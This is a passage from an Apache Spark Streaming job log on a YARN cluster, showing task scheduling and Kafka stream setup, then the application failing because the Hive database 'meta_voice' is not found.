(TID 43, datanode01, executor 2, partition 43, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 37.0 in stage 0.0 (TID 37) in 16 ms on datanode01 (executor 2) (38/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 44.0 in stage 0.0 (TID 44, datanode02, executor 3, partition 44, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 45.0 in stage 0.0 (TID 45, datanode02, executor 3, partition 45, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 40.0 in stage 0.0 (TID 40) in 14 ms on datanode02 (executor 3) (39/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 42.0 in stage 0.0 (TID 42) in 11 ms on datanode02 (executor 3) (40/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 46.0 in stage 0.0 (TID 46, datanode03, executor 1, partition 46, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 39.0 in stage 0.0 (TID 39) in 20 ms on datanode03 (executor 1) (41/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 47.0 in stage 0.0 (TID 47, datanode03, executor 1, partition 47, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 41.0 in stage 0.0 (TID 41) in 20 ms on datanode03 (executor 1) (42/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 48.0 in stage 0.0 (TID 48, datanode01, executor 2, partition 48, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 49.0 in stage 0.0 (TID 49, datanode01, executor 2, partition 49, PROCESS_LOCAL, 7888 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 43.0 in stage 0.0 (TID 43) in 18 ms on datanode01 (executor 2) (43/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 38.0 in stage 0.0 (TID 38) in 31 ms on datanode01 (executor 2) (44/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 45.0 in stage 0.0 (TID 45) in 11 ms on datanode02 (executor 3) (45/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 44.0 in stage 0.0 (TID 44) in 16 ms on datanode02 (executor 3) (46/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 46.0 in stage 0.0 (TID 46) in 18 ms on datanode03 (executor 1) (47/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 48.0 in stage 0.0 (TID 48) in 15 ms on datanode01 (executor 2) (48/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 47.0 in stage 0.0 (TID 47) in 15 ms on datanode03 (executor 1) (49/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 49.0 in stage 0.0 (TID 49) in 25 ms on datanode01 (executor 2) (50/50) 19/08/13 19:53:27 INFO YarnClusterScheduler: Removed TaskSet 0.0, whose tasks have all completed, from pool 19/08/13 19:53:27 INFO DAGScheduler: ShuffleMapStage 0 (start at VoiceApplication2.java:128) finished in 1.174 s 19/08/13 19:53:27 INFO DAGScheduler: looking for newly runnable stages 19/08/13 19:53:27 INFO DAGScheduler: running: Set() 19/08/13 19:53:27 INFO DAGScheduler: waiting: Set(ResultStage 1) 19/08/13 19:53:27 INFO DAGScheduler: failed: Set() 19/08/13 19:53:27 INFO DAGScheduler: Submitting ResultStage 1 (ShuffledRDD[2] at start at VoiceApplication2.java:128), which has no missing parents 19/08/13 19:53:27 INFO MemoryStore: Block broadcast_1 stored as values in memory (estimated size 3.2 KB, free 366.3 MB) 19/08/13 19:53:27 INFO MemoryStore: Block broadcast_1_piece0 stored as bytes in memory (estimated size 1979.0 B, free 366.3 MB) 19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode02:31984 (size: 1979.0 B, free: 366.3 MB) 19/08/13 19:53:27 INFO SparkContext: Created broadcast 1 from broadcast at DAGScheduler.scala:1039 19/08/13 19:53:27 INFO DAGScheduler: Submitting 20 missing tasks from ResultStage 1 (ShuffledRDD[2] at start at VoiceApplication2.java:128) (first 15 tasks are for partitions Vector(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)) 19/08/13 19:53:27 INFO YarnClusterScheduler: Adding task set 1.0 with 20 tasks 19/08/13 19:53:27 INFO TaskSetManager: Starting task 0.0 in stage 1.0 (TID 50, datanode03, executor 1, partition 0, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 1.0 in stage 1.0 (TID 51, datanode02, executor 3, partition 1, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 3.0 in stage 1.0 (TID 52, datanode01, executor 2, partition 3, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 2.0 in stage 1.0 (TID 53, datanode03, executor 1, partition 2, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 4.0 in stage 1.0 (TID 54, datanode02, executor 3, partition 4, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 5.0 in stage 1.0 (TID 55, datanode01, executor 2, partition 5, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode02:28863 (size: 1979.0 B, free: 2.5 GB) 19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode01:20487 (size: 1979.0 B, free: 2.5 GB) 19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode03:3328 (size: 1979.0 B, free: 2.5 GB) 19/08/13 19:53:27 INFO MapOutputTrackerMasterEndpoint: Asked to send map output locations for shuffle 0 to 10.1.229.163:24656 19/08/13 19:53:27 INFO MapOutputTrackerMasterEndpoint: Asked to send map output locations for shuffle 0 to 10.1.198.144:41122 19/08/13 19:53:27 INFO MapOutputTrackerMasterEndpoint: Asked to send map output locations for shuffle 0 to 10.1.229.158:64276 19/08/13 19:53:27 INFO TaskSetManager: Starting task 7.0 in stage 1.0 (TID 56, datanode03, executor 1, partition 7, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 2.0 in stage 1.0 (TID 53) in 192 ms on datanode03 (executor 1) (1/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 8.0 in stage 1.0 (TID 57, datanode03, executor 1, partition 8, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 7.0 in stage 1.0 (TID 56) in 25 ms on datanode03 (executor 1) (2/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 6.0 in stage 1.0 (TID 58, datanode02, executor 3, partition 6, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 1.0 in stage 1.0 (TID 51) in 220 ms on datanode02 (executor 3) (3/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 14.0 in stage 1.0 (TID 59, datanode03, executor 1, partition 14, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 8.0 in stage 1.0 (TID 57) in 17 ms on datanode03 (executor 1) (4/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 16.0 in stage 1.0 (TID 60, datanode03, executor 1, partition 16, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 14.0 in stage 1.0 (TID 59) in 15 ms on datanode03 (executor 1) (5/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 16.0 in stage 1.0 (TID 60) in 21 ms on datanode03 (executor 1) (6/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 9.0 in stage 1.0 (TID 61, datanode02, executor 3, partition 9, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 4.0 in stage 1.0 (TID 54) in 269 ms on datanode02 (executor 3) (7/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 0.0 in stage 1.0 (TID 50) in 339 ms on datanode03 (executor 1) (8/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 10.0 in stage 1.0 (TID 62, datanode02, executor 3, partition 10, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 6.0 in stage 1.0 (TID 58) in 56 ms on datanode02 (executor 3) (9/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 11.0 in stage 1.0 (TID 63, datanode01, executor 2, partition 11, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 5.0 in stage 1.0 (TID 55) in 284 ms on datanode01 (executor 2) (10/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 12.0 in stage 1.0 (TID 64, datanode01, executor 2, partition 12, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 3.0 in stage 1.0 (TID 52) in 287 ms on datanode01 (executor 2) (11/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 13.0 in stage 1.0 (TID 65, datanode02, executor 3, partition 13, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 15.0 in stage 1.0 (TID 66, datanode02, executor 3, partition 15, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 10.0 in stage 1.0 (TID 62) in 25 ms on datanode02 (executor 3) (12/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 9.0 in stage 1.0 (TID 61) in 29 ms on datanode02 (executor 3) (13/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 17.0 in stage 1.0 (TID 67, datanode02, executor 3, partition 17, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 15.0 in stage 1.0 (TID 66) in 13 ms on datanode02 (executor 3) (14/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 13.0 in stage 1.0 (TID 65) in 16 ms on datanode02 (executor 3) (15/20) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 18.0 in stage 1.0 (TID 68, datanode02, executor 3, partition 18, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 19.0 in stage 1.0 (TID 69, datanode01, executor 2, partition 19, NODE_LOCAL, 7638 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 11.0 in stage 1.0 (TID 63) in 30 ms on datanode01 (executor 2) (16/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 12.0 in stage 1.0 (TID 64) in 30 ms on datanode01 (executor 2) (17/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 17.0 in stage 1.0 (TID 67) in 17 ms on datanode02 (executor 3) (18/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 19.0 in stage 1.0 (TID 69) in 13 ms on datanode01 (executor 2) (19/20) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 18.0 in stage 1.0 (TID 68) in 20 ms on datanode02 (executor 3) (20/20) 19/08/13 19:53:27 INFO YarnClusterScheduler: Removed TaskSet 1.0, whose tasks have all completed, from pool 19/08/13 19:53:27 INFO DAGScheduler: ResultStage 1 (start at VoiceApplication2.java:128) finished in 0.406 s 19/08/13 19:53:27 INFO DAGScheduler: Job 0 finished: start at VoiceApplication2.java:128, took 1.850883 s 19/08/13 19:53:27 INFO ReceiverTracker: Starting 1 receivers 19/08/13 19:53:27 INFO ReceiverTracker: ReceiverTracker started 19/08/13 19:53:27 INFO KafkaInputDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO KafkaInputDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO KafkaInputDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO KafkaInputDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO KafkaInputDStream: Initialized and validated org.apache.spark.streaming.kafka.KafkaInputDStream@5fd3dc81 19/08/13 19:53:27 INFO ForEachDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO ForEachDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO ForEachDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO ForEachDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO ForEachDStream: Initialized and validated org.apache.spark.streaming.dstream.ForEachDStream@4044ec97 19/08/13 19:53:27 INFO KafkaInputDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO KafkaInputDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO KafkaInputDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO KafkaInputDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO KafkaInputDStream: Initialized and validated org.apache.spark.streaming.kafka.KafkaInputDStream@5fd3dc81 19/08/13 19:53:27 INFO MappedDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO MappedDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO MappedDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO MappedDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO MappedDStream: Initialized and validated org.apache.spark.streaming.dstream.MappedDStream@5dd4b960 19/08/13 19:53:27 INFO ForEachDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO ForEachDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO ForEachDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO ForEachDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO ForEachDStream: Initialized and validated org.apache.spark.streaming.dstream.ForEachDStream@132d0c3c 19/08/13 19:53:27 INFO KafkaInputDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO KafkaInputDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO KafkaInputDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO KafkaInputDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO KafkaInputDStream: Initialized and validated org.apache.spark.streaming.kafka.KafkaInputDStream@5fd3dc81 19/08/13 19:53:27 INFO MappedDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO MappedDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO MappedDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO MappedDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO MappedDStream: Initialized and validated org.apache.spark.streaming.dstream.MappedDStream@5dd4b960 19/08/13 19:53:27 INFO ForEachDStream: Slide time = 60000 ms 19/08/13 19:53:27 INFO ForEachDStream: Storage level = Serialized 1x Replicated 19/08/13 19:53:27 INFO ForEachDStream: Checkpoint interval = null 19/08/13 19:53:27 INFO ForEachDStream: Remember interval = 60000 ms 19/08/13 19:53:27 INFO ForEachDStream: Initialized and validated org.apache.spark.streaming.dstream.ForEachDStream@525bed0c 19/08/13 19:53:27 INFO DAGScheduler: Got job 1 (start at VoiceApplication2.java:128) with 1 output partitions 19/08/13 19:53:27 INFO DAGScheduler: Final stage: ResultStage 2 (start at VoiceApplication2.java:128) 19/08/13 19:53:27 INFO DAGScheduler: Parents of final stage: List() 19/08/13 19:53:27 INFO DAGScheduler: Missing parents: List() 19/08/13 19:53:27 INFO DAGScheduler: Submitting ResultStage 2 (Receiver 0 ParallelCollectionRDD[3] at makeRDD at ReceiverTracker.scala:613), which has no missing parents 19/08/13 19:53:27 INFO ReceiverTracker: Receiver 0 started 19/08/13 19:53:27 INFO MemoryStore: Block broadcast_2 stored as values in memory (estimated size 133.5 KB, free 366.2 MB) 19/08/13 19:53:27 INFO MemoryStore: Block broadcast_2_piece0 stored as bytes in memory (estimated size 36.3 KB, free 366.1 MB) 19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_2_piece0 in memory on datanode02:31984 (size: 36.3 KB, free: 366.3 MB) 19/08/13 19:53:27 INFO SparkContext: Created broadcast 2 from broadcast at DAGScheduler.scala:1039 19/08/13 19:53:27 INFO DAGScheduler: Submitting 1 missing tasks from ResultStage 2 (Receiver 0 ParallelCollectionRDD[3] at makeRDD at ReceiverTracker.scala:613) (first 15 tasks are for partitions Vector(0)) 19/08/13 19:53:27 INFO YarnClusterScheduler: Adding task set 2.0 with 1 tasks 19/08/13 19:53:27 INFO TaskSetManager: Starting task 0.0 in stage 2.0 (TID 70, datanode01, executor 2, partition 0, PROCESS_LOCAL, 8757 bytes) 19/08/13 19:53:27 INFO RecurringTimer: Started timer for JobGenerator at time 1565697240000 19/08/13 19:53:27 INFO JobGenerator: Started JobGenerator at 1565697240000 ms 19/08/13 19:53:27 INFO JobScheduler: Started JobScheduler 19/08/13 19:53:27 INFO StreamingContext: StreamingContext started 19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_2_piece0 in memory on datanode01:20487 (size: 36.3 KB, free: 2.5 GB) 19/08/13 19:53:27 INFO ReceiverTracker: Registered receiver for stream 0 from 10.1.229.158:64276 19/08/13 19:54:00 INFO JobScheduler: Added jobs for time 1565697240000 ms 19/08/13 19:54:00 INFO JobScheduler: Starting job streaming job 1565697240000 ms.0 from job set of time 1565697240000 ms 19/08/13 19:54:00 INFO JobScheduler: Starting job streaming job 1565697240000 ms.1 from job set of time 1565697240000 ms 19/08/13 19:54:00 INFO JobScheduler: Finished job streaming job 1565697240000 ms.1 from job set of time 1565697240000 ms 19/08/13 19:54:00 INFO JobScheduler: Finished job streaming job 1565697240000 ms.0 from job set of time 1565697240000 ms 19/08/13 19:54:00 INFO JobScheduler: Starting job streaming job 1565697240000 ms.2 from job set of time 1565697240000 ms 19/08/13 19:54:00 INFO SharedState: loading hive config file: file:/data01/hadoop/yarn/local/usercache/hdfs/filecache/85431/__spark_conf__.zip/__hadoop_conf__/hive-site.xml 19/08/13 19:54:00 INFO SharedState: Setting hive.metastore.warehouse.dir ('null') to the value of spark.sql.warehouse.dir ('hdfs://CID-042fb939-95b4-4b74-91b8-9f94b999bdf7/apps/hive/warehouse'). 19/08/13 19:54:00 INFO SharedState: Warehouse path is 'hdfs://CID-042fb939-95b4-4b74-91b8-9f94b999bdf7/apps/hive/warehouse'. 19/08/13 19:54:00 INFO StateStoreCoordinatorRef: Registered StateStoreCoordinator endpoint 19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode02:31984 in memory (size: 1979.0 B, free: 366.3 MB) 19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode02:28863 in memory (size: 1979.0 B, free: 2.5 GB) 19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode01:20487 in memory (size: 1979.0 B, free: 2.5 GB) 19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode03:3328 in memory (size: 1979.0 B, free: 2.5 GB) 19/08/13 19:54:02 INFO CodeGenerator: Code generated in 175.416957 ms 19/08/13 19:54:02 INFO JobScheduler: Finished job streaming job 1565697240000 ms.2 from job set of time 1565697240000 ms 19/08/13 19:54:02 ERROR JobScheduler: Error running job streaming job 1565697240000 ms.2 org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found; at org.apache.spark.sql.catalyst.catalog.ExternalCatalog.requireDbExists(ExternalCatalog.scala:40) at org.apache.spark.sql.catalyst.catalog.InMemoryCatalog.tableExists(InMemoryCatalog.scala:331) at org.apache.spark.sql.catalyst.catalog.SessionCatalog.tableExists(SessionCatalog.scala:388) at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:398) at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:393) at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:122) at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:115) at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280) at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.DStream.createRDDWithLocalProperties(DStream.scala:416) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply$mcV$sp(ForEachDStream.scala:50) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50) at scala.util.Try$.apply(Try.scala:192) at org.apache.spark.streaming.scheduler.Job.run(Job.scala:39) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply$mcV$sp(JobScheduler.scala:257) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257) at scala.util.DynamicVariable.withValue(DynamicVariable.scala:58) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler.run(JobScheduler.scala:256) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:748) 19/08/13 19:54:02 ERROR ApplicationMaster: User class threw exception: org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found; org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found; at org.apache.spark.sql.catalyst.catalog.ExternalCatalog.requireDbExists(ExternalCatalog.scala:40) at org.apache.spark.sql.catalyst.catalog.InMemoryCatalog.tableExists(InMemoryCatalog.scala:331) at org.apache.spark.sql.catalyst.catalog.SessionCatalog.tableExists(SessionCatalog.scala:388) at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:398) at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:393) at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:122) at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:115) at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280) at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.DStream.createRDDWithLocalProperties(DStream.scala:416) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply$mcV$sp(ForEachDStream.scala:50) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50) at scala.util.Try$.apply(Try.scala:192) at org.apache.spark.streaming.scheduler.Job.run(Job.scala:39) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply$mcV$sp(JobScheduler.scala:257) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257) at scala.util.DynamicVariable.withValue(DynamicVariable.scala:58) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler.run(JobScheduler.scala:256) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:748) 19/08/13 19:54:02 INFO ApplicationMaster: Final app status: FAILED, exitCode: 15, (reason: User class threw exception: org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found; at org.apache.spark.sql.catalyst.catalog.ExternalCatalog.requireDbExists(ExternalCatalog.scala:40) at org.apache.spark.sql.catalyst.catalog.InMemoryCatalog.tableExists(InMemoryCatalog.scala:331) at org.apache.spark.sql.catalyst.catalog.SessionCatalog.tableExists(SessionCatalog.scala:388) at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:398) at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:393) at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:122) at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:115) at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280) at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51) at org.apache.spark.streaming.dstream.DStream.createRDDWithLocalProperties(DStream.scala:416) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply$mcV$sp(ForEachDStream.scala:50) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50) at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50) at scala.util.Try$.apply(Try.scala:192) at org.apache.spark.streaming.scheduler.Job.run(Job.scala:39) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply$mcV$sp(JobScheduler.scala:257) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257) at scala.util.DynamicVariable.withValue(DynamicVariable.scala:58) at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler.run(JobScheduler.scala:256) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:748) ) 19/08/13 19:54:02 INFO StreamingContext: Invoking stop(stopGracefully=true) from shutdown hook 19/08/13 19:54:02 INFO ReceiverTracker: Sent stop signal to all 1 receivers 19/08/13 19:54:02 ERROR ReceiverTracker: Deregistered receiver for stream 0: Stopped by driver 19/08/13 19:54:02 INFO TaskSetManager: Finished task 0.0 in stage 2.0 (TID 70) in 35055 ms on datanode01 (executor 2) (1/1) 19/08/13 19:54:02 INFO YarnClusterScheduler: Removed TaskSet 2.0, whose tasks have all completed, from pool 19/08/13 19:54:02 INFO DAGScheduler: ResultStage 2 (start at VoiceApplication2.java:128) finished in 35.086 s 19/08/13 19:54:02 INFO ReceiverTracker: Waiting for receiver job to terminate gracefully 19/08/13 19:54:02 INFO ReceiverTracker: Waited for receiver job to terminate gracefully 19/08/13 19:54:02 INFO ReceiverTracker: All of the receivers have deregistered successfully 19/08/13 19:54:02 INFO ReceiverTracker: ReceiverTracker stopped 19/08/13 19:54:02 INFO JobGenerator: Stopping JobGenerator gracefully 19/08/13 19:54:02 INFO JobGenerator: Waiting for all received blocks to be consumed for job generation 19/08/13 19:54:02 INFO JobGenerator: Waited for all received blocks to be consumed for job generation 19/08/13 19:54:12 WARN ShutdownHookManager: ShutdownHook '$anon$2' timeout, java.util.concurrent.TimeoutException java.util.concurrent.TimeoutException at java.util.concurrent.FutureTask.get(FutureTask.java:205) at org.apache.hadoop.util.ShutdownHookManager$1.run(ShutdownHookManager.java:67) 19/08/13 19:54:12 ERROR Utils: Uncaught exception in thread pool-1-thread-1 java.lang.InterruptedException at java.lang.Object.wait(Native Method) at java.lang.Thread.join(Thread.java:1252) at java.lang.Thread.join(Thread.java:1326) at org.apache.spark.streaming.util.RecurringTimer.stop(RecurringTimer.scala:86) at org.apache.spark.streaming.scheduler.JobGenerator.stop(JobGenerator.scala:137) at org.apache.spark.streaming.scheduler.JobScheduler.stop(JobScheduler.scala:123) at org.apache.spark.streaming.StreamingContext$$anonfun$stop$1.apply$mcV$sp(StreamingContext.scala:681) at org.apache.spark.util.Utils$.tryLogNonFatalError(Utils.scala:1357) at org.apache.spark.streaming.StreamingContext.stop(StreamingContext.scala:680) at org.apache.spark.streaming.StreamingContext.org$apache$spark$streaming$StreamingContext$$stopOnShutdown(StreamingContext.scala:714) at org.apache.spark.streaming.StreamingContext$$anonfun$start$1.apply$mcV$sp(StreamingContext.scala:599) at org.apache.spark.util.SparkShutdownHook.run(ShutdownHookManager.scala:216) at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ShutdownHookManager.scala:188) at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1$$anonfun$apply$mcV$sp$1.apply(ShutdownHookManager.scala:188) at 